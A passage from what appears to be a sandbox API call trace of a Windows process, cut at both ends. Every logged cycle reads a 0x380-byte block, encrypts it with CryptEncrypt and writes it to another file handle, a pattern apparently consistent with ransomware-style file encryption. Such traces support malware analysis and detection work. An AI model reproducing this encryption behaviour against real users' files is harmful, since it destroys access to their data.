lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.094] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.094] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.094] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.095] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.095] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.096] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.096] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.096] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.096] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.096] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.096] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.097] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.097] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.097] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.097] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.097] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.097] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.097] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.097] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.097] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.097] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.098] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.098] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.099] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.099] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.100] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.100] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.100] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.100] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.100] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.100] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.101] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.101] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] ReadFile (in: hFile=0x5d3c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.102] CryptEncrypt (in: hKey=0x2fb1c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.102] WriteFile (in: hFile=0x5d48, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, 